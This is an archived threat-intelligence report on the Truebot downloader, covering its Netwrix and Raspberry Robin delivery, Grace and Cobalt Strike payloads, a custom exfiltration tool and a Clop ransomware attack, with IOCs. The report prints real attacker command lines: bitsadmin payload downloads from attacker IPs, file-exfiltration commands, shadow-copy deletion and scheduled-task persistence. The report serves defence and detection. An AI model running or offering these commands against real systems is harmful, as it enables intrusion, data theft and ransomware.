{ "id": "2b1633d7-0539-4351-ad72-ede13f5c8907", "created_at": "2026-04-06T00:10:50.052028Z", "updated_at": "2026-04-10T03:36:37.113449Z", "deleted_at": null, "sha1_hash": "1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7", "title": "Breaking the silence - Recent Truebot activity", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3319498, "plain_text": "Breaking the silence - Recent Truebot activity\r\nBy Tiago Pereira\r\nPublished: 2022-12-08 · Archived: 2026-04-05 19:57:14 UTC\r\nThursday, December 8, 2022 14:38\r\nSince August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot\r\nwas first identified in 2017 and researchers have linked it to a threat actor called Silence Group that is responsible\r\nfor several high-impact attacks on financial institutions in several countries around the world.\r\nThere are claims by other researchers that this group is associated with the well-known threat actor TA505 (aka\r\nEvil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops is Grace (aka\r\nFlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.\r\nRecently, the attackers have shifted from using malicious emails as their primary delivery method to other\r\ntechniques. In August, we saw a small number of attacks that exploited a recent remote code execution\r\nvulnerability in Netwrix auditor. In October, a larger number of infections leveraged Raspberry Robin, a recent\r\nmalware spread through USB drives, as a delivery vector. We believe with moderate confidence that during\r\nNovember, the attackers started using yet another way to distribute the malware.\r\nPost-compromise activity included data theft and the execution of Clop ransomware. While investigating one of\r\nthese attacks, we found what seems to be a fully featured custom data exfiltration tool, which we are calling\r\n\"Teleport,\" that was extensively used to steal information during the attack.\r\nSo far, we have identified two different Truebot botnets. One is distributed worldwide, but with particular focus on\r\nMexico, Pakistan, and Brazil. The second, more recent botnet appears to be focused on the U.S. While we don't\r\nhave enough information to say that there is a specific focus on a sector, we noticed a number of compromised\r\neducation sector organizations.\r\nNew attack vectors\r\nIn August, we noticed a small number of cases where Truebot was executed after the exploitation of a\r\nvulnerability in Netwrix Auditor, an IT asset management tool.\r\nWe have high confidence that this was used as the entry vector on some of the compromised organizations.\r\nHowever, due to the reduced exposure of this product directly on the internet, it is unlikely that the attackers\r\nmanaged to compromise a high number of systems this way.\r\nLater, in the beginning of October, we started seeing a bigger uptick in Truebot infections, as it started being\r\ndelivered by Raspberry Robin malware. This was also noticed by others, such as Microsoft, which wrote a blog\r\npost focused on the connections of Raspberry Robin to a larger ecosystem that included Truebot as one of the\r\npayloads.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 1 of 14\n\nWe believe with high confidence that these two vectors, mainly the Raspberry Robin delivery, led to the creation\r\nof a botnet of over 1,000 systems that is distributed worldwide, but with particular focus on Mexico, Brazil, and\r\nPakistan, as seen in the following image.\r\nIn November, we started seeing a new botnet being created.The following image shows the evolution of the\r\ninfections on this botnet, based on openDNS telemetry:\r\nWhile the the victims of the first botnet were mostly desktop systems not directly accessible from the internet, this\r\nsecond botnet is almost exclusively composed of Windows servers, directly connected to the internet, and\r\nexposing several Windows services such as SMB, RDP, and WinRM, but interestingly not Netwrix. This suggests\r\nthat the attackers are using another distribution mechanism, although we have not yet identified this attack vector.\r\nThis new botnet, with over 500 infections at the time of writing, seems to be focused on the U.S. (around 75% of\r\ninfections). The following image shows the geographic infection distribution.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 2 of 14\n\nNetwrix vulnerability (CVE-2022-31199) based delivery\r\nBetween mid-August and September, we observed a small number of events in which suspicious commands were\r\nexecuted by a process named UAVRServer.exe. This process triggered the execution of bitsadmin to download\r\nand execute a binary. Further research revealed that this was an updated version of Truebot.\r\nThe following is an example of one of these commands executed by the UAVRServer.exe process:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dl\r\nAlthough we were not able to collect the exploit code. Because multiple of these events occurred in the same\r\ntimeframe on unrelated organizations, we believe with high confidence that these events are the result of the\r\nexploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) that was made public in July 2022 by\r\nBishop Fox.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 3 of 14\n\nNetwrix Auditor is an auditing tool that is used to assess the compliance with security and other best practices of\r\nIT assets and, according to the vulnerability disclosure document: “Netwrix Auditor is vulnerable to an insecure\r\nobject deserialization issue that is caused by an unsecured .NET remoting service. An attacker can submit\r\narbitrary objects to the application through this service to achieve remote code execution on Netwrix Auditor\r\nservers.”\r\nHowever, the vulnerable .NET remoting service would not usually be exposed to the internet, which may explain\r\nwhy we have seen only a small number of these attacks. We were able to confirm that at least one of the exploited\r\nsystems was directly exposed to the internet with minimal or no firewall protection, and believe with high\r\nconfidence that this exploit was the entry vector to an attack that included further post-compromise activity.\r\nAccording to the vulnerability disclosure document: “Since this service is typically executed with extensive\r\nprivileges in an Active Directory environment, the attacker would likely be able to compromise the Active\r\nDirectory domain.”\r\nThis means that exploiting the vulnerability is effectively a fast track to compromising an organization domain-wide. It also means that this vulnerability is likely to be exploited within organizations that are already\r\ncompromised to get administrative rights without raising any red flags.\r\nThis vulnerability had been published only a few weeks before the attacks took place, and the number of systems\r\nexposed from the internet is expected to be quite small. This suggests that the attackers are not only on the lookout\r\nfor new infection vectors, but are also able to quickly test them and incorporate them into their workflow.\r\nRaspberry Robin delivery\r\nMore recently, since the beginning of October, we started seeing a higher number of systems infected with\r\nTruebot. This timeframe corresponded with new research that found many of these systems had previous\r\nRaspberry Robin infections that were delivering Truebot.\r\nThis has been documented by Microsoft in a blog detailing how Raspberry Robin is part of a larger criminal\r\necosystem and has recently started delivering a few other malware families, including FakeUpdates, IcedID,\r\nBumblebee, and Truebot.\r\nIn our telemetry, we have observed multiple occurrences of Raspberry Robin delivering Truebot. The following\r\nimage illustrates the attack sequence.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 4 of 14\n\nThe system was infected with Raspberry Robin through a USB device and, just a few minutes later, the malicious\r\nprocess downloaded the Truebot .dll file and executed it using rundll32.exe.\r\nIn other cases, the Raspberry Robin infection that delivered Truebot had been present for some time.\r\nNew Truebot version\r\nTruebot is a downloader malware. As such, its main goal is to infect systems, collect information to help triage\r\ninteresting targets, and deploy additional payloads. Once a system is infected, the malware collects information\r\nand sends it to the attacker’s command and control (C2). This version collects additional information: a\r\nscreenshot, the computer name, the local network name, and active directory trust relations.\r\nThis collected information hints at what the attackers are looking for. Active directory trust relations allow\r\norganizations to share users and resources across domains. Some use cases include extranets, connecting service\r\nproviders or even mergers and acquisitions.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 5 of 14\n\nThis suggests the attackers are targeting large organizations, where these relations are more commonly deployed.\r\nBesides being a great indicator of a large organization, one example where this information could prove useful\r\nwould be in finding a poorly protected network (for example, a company acquisition) that would provide an entry\r\nroute to a more secure network.\r\nAs a downloader tool, there are also some features that were not present in previously documented versions of the\r\nmalware. Besides downloading and executing files, the malware is now able to load and execute additional\r\nmodules and shellcodes in memory, making the payloads less likely to be detected.\r\nAs illustrated in the image above, the “404NOTFOUND” command is used to emit no command. The “KLL |\r\nKLLSELF” commands causes the bot to uninstal, and, if the response contains an HTTP URL followed by a “|\r\n\u003caction\u003e” keyword, it performs one of the following actions:\r\n|EXE – Download and run .exe file\r\n|DLL – Download and run .dll file\r\n|PS1 – Download and run .ps1 file\r\n|BAT – Download and run .bat file\r\n|DNM – Download and run .dll in memory\r\n|SCH – Download and run shellcode\r\n|S64 – Download and run 64 bit shellcode\r\nThe communication protocol changed slightly to include the new features. In summary, the HTTP communication\r\nincludes new fields to include the network name and trust relations data and it is sent as a POST request with a\r\nparameter “q=\u003cbase64 encoded data\u003e”. The remaining protocol details and encryption mechanism seem to remain\r\nunchanged, as has been previously documented.\r\nPost-compromise activity\r\nPost compromise, we found two payloads delivered by Truebot, Cobalt Strike and Grace malware. and what\r\nseems to be a custom data exfiltration tool that was used extensively by the attackers to steal information from the\r\nnetwork.\r\nGrace and Cobalt Strike\r\nOnce the systems have been compromised with Truebot, the attackers triage what seem to be interesting systems\r\nfor further analysis and deploy additional malware to assist in that analysis.\r\nIn this case, the payloads we found were 32- and 64-bit versions of Cobalt Strike reverse shell shellcode, Cobalt\r\nStrike delivered through PowerShell reflection, and a Grace shellcode loader containing a complex packer that\r\ncontained Grace malware. This is a fairly complex packer, that was called “GraceWrapper” by Outpost24, that\r\nextensively documented it in a recent blog post, based on samples from an attack documented by Proofpoint in\r\nlate 2021 where the new version of Grace was spotted.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 6 of 14\n\nAfter unpacking, we were able to obtain a Grace binary, easily identifiable by a string in memory as well as the\r\nC++ class names left in the binary.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 7 of 14\n\nFinding Grace as a payload is interesting, as it is known to be almost exclusively used by TA505, which further\r\nstrengthens previous claims of a connection between Silence Group and TA505 made by Group-IB, which was\r\nbased on source code comparison with FlawedAmmyy; and by Deutsche Telekom, by identifying different\r\nmalware packed with TA505’s custom packer.\r\nAfter dropping one of the described payloads, the post-compromise attack flow is similar to that of other human-operated attacks. However, while investigating, we came across a set of commands to exfiltrate stolen data that\r\nmade use of a tool that was unknown to us.\r\nAfter examining the binary, we found what seems to be a custom data exfiltration tool built in C++ and containing\r\nseveral features that make the process of data exfiltration easier and stealthier. We are calling it \"Teleport\" based\r\non the communication encryption key hardcoded in the binary.\r\nRegarding the tool’s features, the following usage information provided by the tool itself is a great summary:\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 8 of 14\n\nUsage: tool.exe /RH:str /RP:int [/RS:int] [/P:str] [/D:str] [/DS:str] [/M:str] [/MX:str] [/SL:int] [/SU:int] [/\r\n/RH:str -- Server host name to upload to\r\n/RP:int -- Server port number to upload to\r\n/RS:int -- Upload speed (in kilobytes per second)\r\n/P:str -- Directory prefix\r\n/D:str -- Directory to download from (recursive search)\r\n/DS:str -- Directory to download from (non-recursive search)\r\n/M:str -- File mask (default is *.*)\r\n/MX:str -- File mask to exclude\r\n/SL:int -- Lower size limit (in bytes)\r\n/SU:int -- Upper size limit (in bytes)\r\n/CS:str -- Creation date since (DDMMYYYY)\r\n/CU:str -- Creation date until (DDMMYYYY)\r\n/MS:str -- Modified date since (DDMMYYYY)\r\n/MU:str -- Modified date until (DDMMYYYY)\r\n/E -- Prescan mode (cache files before sending)\r\n/K -- Remove itself after execution\r\n/Q -- Quiet mode (don't show messages)\r\nEither /D or /DS must be specified.\r\nFlags /M, /MX, /D and /DS may be used more than once.\r\nLooking at the feature list we can see that, while not malicious per se, it has some features that are not common in\r\nremote copying tools that are useful to an attacker exfiltrating data during an attack:\r\nLimiting the upload speed, which can make the transmission go undetected by tools that monitor for large\r\ndata exfiltration. This can avoid making the network slow due to the file copying activity.\r\nThe communication is encrypted with a custom protocol to hide what information is being transmitted.\r\nLimiting the file size, which can maximize the number of stolen files by avoiding lengthy copies of files\r\nthat may not be interesting.\r\nThe ability to delete itself after use, which is ideal to keep it as unknown as possible.\r\nWhile testing Teleport, we saw that the data was not in clear text. Further analysis revealed that it uses a custom\r\ncommunication protocol that encrypts data using AES and a hardcoded key. Reverse engineering revealed the\r\nfollowing protocol structure that wraps the messages with an encryption layer.\r\nMost messages sent by the tool to its server start with a message-type identifier, followed by the size of the\r\nremaining payload, of which the first four bytes are a CRC32 check to ensure the integrity of the message, the\r\nnext 16 bytes are a random initialization vector. and the remaining bytes are the encrypted payload content using\r\nthe algorithm AES/CBC/Nopadding.\r\nThe use of a custom data exfiltration tool is curious. Why would an attacker develop such a tool when there are so\r\nmany different file copying solutions? There are a few possible reasons.\r\nFor example, it makes the process of stealing interesting information from an unknown network of unknown\r\nsystems faster. If we look at its use during the attack, we can see that the attackers are repeating on a large number\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 9 of 14\n\nof systems a few commands that the attackers know have good potential of gathering valuable information. For\r\nexample:\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003c\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /M:*.ost /M:*.pst /P:\u003cremote path\u003e\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003cr\r\nThese commands effectively collect interesting files from the user’s OneDrive and Downloads folders and collect\r\nthe user’s Outlook emails. Combining filtering by extension, file size, and file age allows the creation of\r\ncommands that are repeatable and effective.\r\nAnother reason includes stealth. It is not on the list of common file copying files, which provides limited\r\nstealthiness, but it also allows the limitation of bandwidth usage and communication encryption.\r\nThe Clop attack\r\nAs previously mentioned, one of the possible outcomes of these attacks is double extortion using Clop\r\nransomware. We had the opportunity to investigate one of these attacks in further detail. The following table\r\nsummarizes the techniques used organized by the MITRE ATT\u0026CK framework.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 10 of 14\n\nThe attack was in its essence similar to many other human-operated ransomware attacks. After compromise, the\r\nattackers dropped Cobalt Strike on several systems and started mapping the network and moving laterally to\r\nsystems of interest. During the exploration and lateral movement phases, the attackers browsed key server and\r\ndesktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to\r\nan attacker-controlled server. Once sufficient data had been collected, the attackers created scheduled tasks on a\r\nlarge number of systems to simultaneously start executing the Clop ransomware and encrypt the highest possible\r\nvolume of data.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 11 of 14\n\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 60844-60845, 60948-60949, 300329\r\nIOCs\r\nIOCs for this research can be found in our GitHub repository here. \r\nNetwrix exploitation command examples:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer IVjATqWXcLnw hxxp://179[.]60[.]150[.]53:80/download/Googl\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer SysLog hxxp://179[.]60[.]150[.]34:80/download/file.ext c:\\\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll\r\nNew Truebot version\r\nSamples:\r\n092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875 1ef8cdbd3773bd82e5be25d4ba61e5e59371c633172684\r\nb95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf\r\n80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9\r\nDownload URLS:\r\nhxxp://179[.]60[.]150[.]34:80/download/file.ext\r\nhxxp://179[.]60[.]150[.]53:80/download/msruntime.dll\r\nhxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll\r\nhxxp://tddshht[.]com/chkds.dll\r\nC2 addresses:\r\nhxxp://nefosferta.com/gate.php\r\nhxxp://185[.]55.[.]243[.]110/gate.php\r\nhxxp://gbpooolfhbrb[.]com/gate.php\r\nhxxp://88[.]214[.]27[.]100/gate.php\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 12 of 14\n\nhxxp://hiperfdhaus.com/gate.php\r\nhxxp://88[.]214[.]27[.]101/gate.php\r\nhxxp://jirostrogud[.]com/gate.php\r\nSample:\r\ndd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4\r\nGrace\r\nSample (decrypted shellcode):\r\n27b6e71b4adeada41fb1e411a910872bfad999183d9d43ba6e63602e104d357b\r\nC2:\r\n45[.]227[.]253[.]102\r\nClop ransomware\r\nFollowing are some of the command lines observed during this attack that may help detect ongoing malicious\r\nactivity. There are, however, benign or dual-use tools and commands in this list so, they should not be used as the\r\nsole indicator of an ongoing attack.\r\nadfind.exe -f \u0026(objectcategory=computer) operatingsystem -csv\r\nadfind -f objectcategory=person samaccountname name displayname givenname department description title mail logo\r\nadfind.exe -h \u003credacted\u003e -f \u0026(objectcategory=computer) operatingsystem samaccountname name displayname givenname\r\nsqlcmd -q select name from sys.databases\r\nsqlcmd -s \u003chostname\u003e -q select name from sys.databases\r\nsqlcmd -s \u003chostname\u003e -q set nocount on; select table_name from information_schema.tables where table_type = 'bas\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003cr\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /M:*.ost /M:*.pst /P:\u003cremote path\u003e\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003cr\r\nC:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where ID=\u003credacted\u003e delete\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 13 of 14\n\nC:\\windows\\WinCDropQSysvolY.exe\r\nC:\\windows\\WinCDropQSysvolY.exe runrun\r\nschtasks.exe /create /tn OneDrvTest /tr C:\\windows\\SysZDropQLogonQ.exe /s\r\n\u003credacted\u003e /sc onstart /ru system /f\r\nschtasks.exe /run /tn OneDrvTest /s \u003credacted\u003e\r\nSource: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/" ], "report_names": [ "breaking-the-silence-recent-truebot-activity" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "e8ebcbda-e8df-4a38-a2a6-63b2608ee6f3", "created_at": "2023-01-06T13:46:38.88051Z", "updated_at": "2026-04-10T02:00:03.131218Z", "deleted_at": null, "main_name": "Silence group", "aliases": [ "WHISPER SPIDER" ], "source_name": "MISPGALAXY:Silence group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "6c4f98b3-fe14-42d6-beaa-866395455e52", "created_at": "2023-01-06T13:46:39.169554Z", "updated_at": "2026-04-10T02:00:03.23458Z", "deleted_at": null, "main_name": "Evil Corp", "aliases": [ "GOLD DRAKE" ], "source_name": "MISPGALAXY:Evil Corp", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434250, "ts_updated_at": 1775792197, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7.pdf", "text": "https://archive.orkl.eu/1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7.txt", "img": "https://archive.orkl.eu/1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7.jpg" } }